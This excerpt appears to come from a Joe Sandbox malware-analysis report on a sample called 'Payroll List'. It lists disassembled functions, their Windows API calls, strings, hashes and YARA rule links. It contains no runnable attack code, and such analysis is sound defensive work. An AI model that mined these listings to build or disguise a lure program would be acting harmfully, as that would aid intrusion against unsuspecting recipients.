                                                                    • Opcode Fuzzy Hash: a953cc5705d18aea3dbe8b260b932945098b00ca7c08f295c23242ef042b4411
                                                                    • Instruction Fuzzy Hash: 5251B131644700AFD710EF64DC49B2ABBF4EF59320F048869FA5ADB2A1DB30E941CB41
                                                                    Function 00189E43 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00189E5B
                                                                    • CreateMenu.USER32 ref: 00189E76
                                                                    • SetMenu.USER32(?,00000000), ref: 00189E85
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00189F12
                                                                    • IsMenu.USER32(?), ref: 00189F28
                                                                    • CreatePopupMenu.USER32 ref: 00189F32
                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00189F63
                                                                    • DrawMenuBar.USER32 ref: 00189F71
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                    • String ID: 0
                                                                    • API String ID: 176399719-4108050209
                                                                    • Opcode ID: d35201a4057f6171c125d13933b023de8b0d93e403ba4e6e618c39d27295a7d5
                                                                    • Instruction ID: 4fc5dae658d38dec4f9b1bbbe31421f5819ccbfc88aa677d67f5bab31f8c9899
                                                                    • Opcode Fuzzy Hash: d35201a4057f6171c125d13933b023de8b0d93e403ba4e6e618c39d27295a7d5
                                                                    • Instruction Fuzzy Hash: 20414C74A01205AFDB14DFA4E884BEABBB5FF49314F184119FA46EB350D770AA54CF50
                                                                    Function 0016E389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0016E396
                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0016E40C
                                                                    • GetLastError.KERNEL32 ref: 0016E416
                                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 0016E483
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                    • API String ID: 4194297153-14809454
                                                                    • Opcode ID: 0e5bb36edaf9442824b4fe9bbe40092f5fb7c141f9df09f420cfd2dd3d334922
                                                                    • Instruction ID: b0b63c1ff7087d2b361df03b4bc9aed9a23a855c4dd8c8ec2ae490fb63e5cee9
                                                                    • Opcode Fuzzy Hash: 0e5bb36edaf9442824b4fe9bbe40092f5fb7c141f9df09f420cfd2dd3d334922
                                                                    • Instruction Fuzzy Hash: 9D318439A002199FDB01EFB4DC45ABDB7F4EF55300F148126E516EB291DB70AA51CB91
                                                                    Function 0015B907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0015B98C
                                                                    • GetDlgCtrlID.USER32 ref: 0015B997
                                                                    • GetParent.USER32 ref: 0015B9B3
                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 0015B9B6
                                                                    • GetDlgCtrlID.USER32(?), ref: 0015B9BF
                                                                    • GetParent.USER32(?), ref: 0015B9DB
                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 0015B9DE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CtrlParent
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 1383977212-1403004172
                                                                    • Opcode ID: 4ad315edfee1a2363b36c2bbe4cf9e97a9cf8ddadb9d6856e60d3d735bf7e5ed
                                                                    • Instruction ID: 793b46fea5716feb7cfcb9ef4140e03a33a84a8887917cfad8dd72fce5e3b374
                                                                    • Opcode Fuzzy Hash: 4ad315edfee1a2363b36c2bbe4cf9e97a9cf8ddadb9d6856e60d3d735bf7e5ed
                                                                    • Instruction Fuzzy Hash: 0921B3B4900104FFDB04ABA4DC86EFEBB75EF5A301F10011AFA66972E1DB745869DB60
                                                                    Function 0015B9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0015BA73
                                                                    • GetDlgCtrlID.USER32 ref: 0015BA7E
                                                                    • GetParent.USER32 ref: 0015BA9A
                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 0015BA9D
                                                                    • GetDlgCtrlID.USER32(?), ref: 0015BAA6
                                                                    • GetParent.USER32(?), ref: 0015BAC2
                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 0015BAC5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CtrlParent
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 1383977212-1403004172
                                                                    • Opcode ID: 110a7a10f17a7b0605d6e5d2be6ad38101a999580cb6258f2fe2b8c34d820635
                                                                    • Instruction ID: 94be8c5ff966343143e25b448e4c2855428419d1481dac73d02fd848fef2e1c6
                                                                    • Opcode Fuzzy Hash: 110a7a10f17a7b0605d6e5d2be6ad38101a999580cb6258f2fe2b8c34d820635
                                                                    • Instruction Fuzzy Hash: 422104B4A00108BFDB04EFA0DC85EFEBB78EF55300F100015F962A7291EBB54869DB60
                                                                    Function 0015BAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetParent.USER32 ref: 0015BAE3
                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 0015BAF8
                                                                    • _wcscmp.LIBCMT ref: 0015BB0A
                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0015BB85
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameParentSend_wcscmp
                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                    • API String ID: 1704125052-3381328864
                                                                    • Opcode ID: 17a64852c08836f0670cad333de9e8143d3cc68401fc0d88cdef7471375ecb7e
                                                                    • Instruction ID: 68a66c59ff16fc812286a322075960d66f70e184f8898fc79404f717bcf922d8
                                                                    • Opcode Fuzzy Hash: 17a64852c08836f0670cad333de9e8143d3cc68401fc0d88cdef7471375ecb7e
                                                                    • Instruction Fuzzy Hash: AA11297660C703FAFA256635EC47DA6379CDB35320B200022FE29E94E5FBF168954514
                                                                    Function 0017B2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(?), ref: 0017B2D5
                                                                    • CoInitialize.OLE32(00000000), ref: 0017B302
                                                                    • CoUninitialize.OLE32 ref: 0017B30C
                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 0017B40C
                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 0017B539
                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0017B56D
                                                                    • CoGetObject.OLE32(?,00000000,001AD91C,?), ref: 0017B590
                                                                    • SetErrorMode.KERNEL32(00000000), ref: 0017B5A3
                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0017B623
                                                                    • VariantClear.OLEAUT32(001AD91C), ref: 0017B633
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                    • String ID:
                                                                    • API String ID: 2395222682-0
                                                                    • Opcode ID: f5119161292ac27eb6eb72be98c027cc4752839a0e9191d853ae38ba680747f0
                                                                    • Instruction ID: 90271d37d27a95ca13cf9ea12bbd5bf79f8f21547871a658077a168bf62b348d
                                                                    • Opcode Fuzzy Hash: f5119161292ac27eb6eb72be98c027cc4752839a0e9191d853ae38ba680747f0
                                                                    • Instruction Fuzzy Hash: AEC10371608305AFC704DF64D884A6BB7F9BF89308F00895DF58A9B251DB71ED45CB52
                                                                    Function 0014ACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __lock.LIBCMT ref: 0014ACC1
                                                                      • Part of subcall function 00147CF4: __mtinitlocknum.LIBCMT ref: 00147D06
                                                                      • Part of subcall function 00147CF4: EnterCriticalSection.KERNEL32(00000000,?,00147ADD,0000000D), ref: 00147D1F
                                                                    • __calloc_crt.LIBCMT ref: 0014ACD2
                                                                      • Part of subcall function 00146986: __calloc_impl.LIBCMT ref: 00146995
                                                                      • Part of subcall function 00146986: Sleep.KERNEL32(00000000,000003BC,0013F507,?,0000000E), ref: 001469AC
                                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 0014ACED
                                                                    • GetStartupInfoW.KERNEL32(?,001D6E28,00000064,00145E91,001D6C70,00000014), ref: 0014AD46
                                                                    • __calloc_crt.LIBCMT ref: 0014AD91
                                                                    • GetFileType.KERNEL32(00000001), ref: 0014ADD8
                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0014AE11
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                    • String ID:
                                                                    • API String ID: 1426640281-0
                                                                    • Opcode ID: 1c597af390fb2129aaeadf7d064b97139f68af1add7bab6c4f8a79551a713fe7
                                                                    • Instruction ID: ffcc6586abf6e60a65416f88f7af3ac43478e119ca486e4816d2792615d08294
                                                                    • Opcode Fuzzy Hash: 1c597af390fb2129aaeadf7d064b97139f68af1add7bab6c4f8a79551a713fe7
                                                                    • Instruction Fuzzy Hash: 8781F4B1D457418FDB14CFA8C8805ADBBF0AF0A324BA5426DD4A6AB7E1C7349843CB52
                                                                    Function 001667E9 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __swprintf.LIBCMT ref: 001667FD
                                                                    • __swprintf.LIBCMT ref: 0016680A
                                                                      • Part of subcall function 0014172B: __woutput_l.LIBCMT ref: 00141784
                                                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 00166834
                                                                    • LoadResource.KERNEL32(?,00000000), ref: 00166840
                                                                    • LockResource.KERNEL32(00000000), ref: 0016684D
                                                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 0016686D
                                                                    • LoadResource.KERNEL32(?,00000000), ref: 0016687F
                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 0016688E
                                                                    • LockResource.KERNEL32(?), ref: 0016689A
                                                                    • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 001668F9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                    • String ID:
                                                                    • API String ID: 1433390588-0
                                                                    • Opcode ID: 9e9ee43904318787425a1696b90df7caed074db670adeaf9de221e2188839dd2
                                                                    • Instruction ID: b1b653a982336548a38735bc836160edb5bb16994c69288b4a17f82f29c012be
                                                                    • Opcode Fuzzy Hash: 9e9ee43904318787425a1696b90df7caed074db670adeaf9de221e2188839dd2
                                                                    • Instruction Fuzzy Hash: B4316D7190025AABDB119FB1ED95ABE7BACEF09341B008426F902E7550E734D9A1DBA0
                                                                    Function 00164025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00164047
                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,001630A5,?,00000001), ref: 0016405B
                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 00164062
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,001630A5,?,00000001), ref: 00164071
                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00164083
                                                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,001630A5,?,00000001), ref: 0016409C
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,001630A5,?,00000001), ref: 001640AE
                                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,001630A5,?,00000001), ref: 001640F3
                                                                    • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,001630A5,?,00000001), ref: 00164108
                                                                    • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,001630A5,?,00000001), ref: 00164113
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                    • String ID:
                                                                    • API String ID: 2156557900-0
                                                                    • Opcode ID: 11c5db9a9d9b929778606bc3ebadbaa287cce1dce79663acf5e13ef61dbab930
                                                                    • Instruction ID: 4358b5af54dd0d066943fb830a80b208303d4b020b71330bcf1a14167742f008
                                                                    • Opcode Fuzzy Hash: 11c5db9a9d9b929778606bc3ebadbaa287cce1dce79663acf5e13ef61dbab930
                                                                    • Instruction Fuzzy Hash: 8D31A5B1500214AFDB10DF95EC89BBD77AABB56312F218106F915DBA90CBB4EDC08B60
                                                                    Function 0019DD4A Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetSysColor.USER32(00000008), ref: 0013B496
                                                                    • SetTextColor.GDI32(?,000000FF), ref: 0013B4A0
                                                                    • SetBkMode.GDI32(?,00000001), ref: 0013B4B5
                                                                    • GetStockObject.GDI32(00000005), ref: 0013B4BD
                                                                    • GetClientRect.USER32(?), ref: 0019DD63
                                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 0019DD7A
                                                                    • GetWindowDC.USER32(?), ref: 0019DD86
                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0019DD95
                                                                    • ReleaseDC.USER32(?,00000000), ref: 0019DDA7
                                                                    • GetSysColor.USER32(00000005), ref: 0019DDC5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                    • String ID:
                                                                    • API String ID: 3430376129-0
                                                                    • Opcode ID: fa983a59eaff0ac659d558d5334247fe86335fe1d3996c37b20663985ea8e5ae
                                                                    • Instruction ID: fa9e91f71d780cf7a23c2482fe6f8ed2144a106e89d306505136c30fa4dd4ed6
                                                                    • Opcode Fuzzy Hash: fa983a59eaff0ac659d558d5334247fe86335fe1d3996c37b20663985ea8e5ae
                                                                    • Instruction Fuzzy Hash: BC114C71500605AFDB216FB4FC48BE97BB1EB06325F118625FA6B958E2DB310981DB21
                                                                    Function 0015CB82 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EnumChildWindows.USER32(?,0015CF50), ref: 0015CE90
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ChildEnumWindows
                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                    • API String ID: 3555792229-1603158881
                                                                    • Opcode ID: 60e3b215b5b1087d7f17b87965ab8b5ba69bb519c5f01bda01a61db1ad1cac81
                                                                    • Instruction ID: 3d87dc2e1cb805f31924d86f19be70a629d14cc0f92b7f97b0a80ed5b2b91088
                                                                    • Opcode Fuzzy Hash: 60e3b215b5b1087d7f17b87965ab8b5ba69bb519c5f01bda01a61db1ad1cac81
                                                                    • Instruction Fuzzy Hash: 46912F30600606EECB18DFA0C482BEAFBB5FF14341F55851AD869BB191DF70A95ADBD0
                                                                    Function 00123093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 001230DC
                                                                    • CoUninitialize.OLE32(?,00000000), ref: 00123181
                                                                    • UnregisterHotKey.USER32(?), ref: 001232A9
                                                                    • DestroyWindow.USER32(?), ref: 00195079
                                                                    • FreeLibrary.KERNEL32(?), ref: 001950F8
                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00195125
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                    • String ID: close all
                                                                    • API String ID: 469580280-3243417748
                                                                    • Opcode ID: 84fdb8c291aa4a91301323e5676b0321b9721a8f022506a3a4edb94818ec0dd4
                                                                    • Instruction ID: 39174fc65b6864399198e26ae5b1a66c86a91179675031b3367d8ba194173b93
                                                                    • Opcode Fuzzy Hash: 84fdb8c291aa4a91301323e5676b0321b9721a8f022506a3a4edb94818ec0dd4
                                                                    • Instruction Fuzzy Hash: 29912B30600222CFCB0AEF14E895A68F3B5FF25304F5541A9E51AA7662DB34AE66CF54
                                                                    Function 0013CB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 0013CC15
                                                                      • Part of subcall function 0013CCCD: GetClientRect.USER32(?,?), ref: 0013CCF6
                                                                      • Part of subcall function 0013CCCD: GetWindowRect.USER32(?,?), ref: 0013CD37
                                                                      • Part of subcall function 0013CCCD: ScreenToClient.USER32(?,?), ref: 0013CD5F
                                                                    • GetDC.USER32 ref: 0019D137
                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0019D14A
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0019D158
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0019D16D
                                                                    • ReleaseDC.USER32(?,00000000), ref: 0019D175
                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0019D200
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                    • String ID: U
                                                                    • API String ID: 4009187628-3372436214
                                                                    • Opcode ID: 5a050770292fbee22856e3ae9d351bd42819c8e01b5d9800c11c350279f02c4f
                                                                    • Instruction ID: b6d1b0584fbb9cf64cd11c6928e143a39c0ca800584af5a30f5df8ba906822c3
                                                                    • Opcode Fuzzy Hash: 5a050770292fbee22856e3ae9d351bd42819c8e01b5d9800c11c350279f02c4f
                                                                    • Instruction Fuzzy Hash: 1A71FF31400205EFCF259F64EC85AEA7BB5FF59350F184269FD5A6A2A6C7318C81DFA0
                                                                    Function 0018ECD4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0013B34E: GetWindowLongW.USER32(?,000000EB), ref: 0013B35F
                                                                      • Part of subcall function 0013B63C: GetCursorPos.USER32(000000FF), ref: 0013B64F
                                                                      • Part of subcall function 0013B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0013B66C
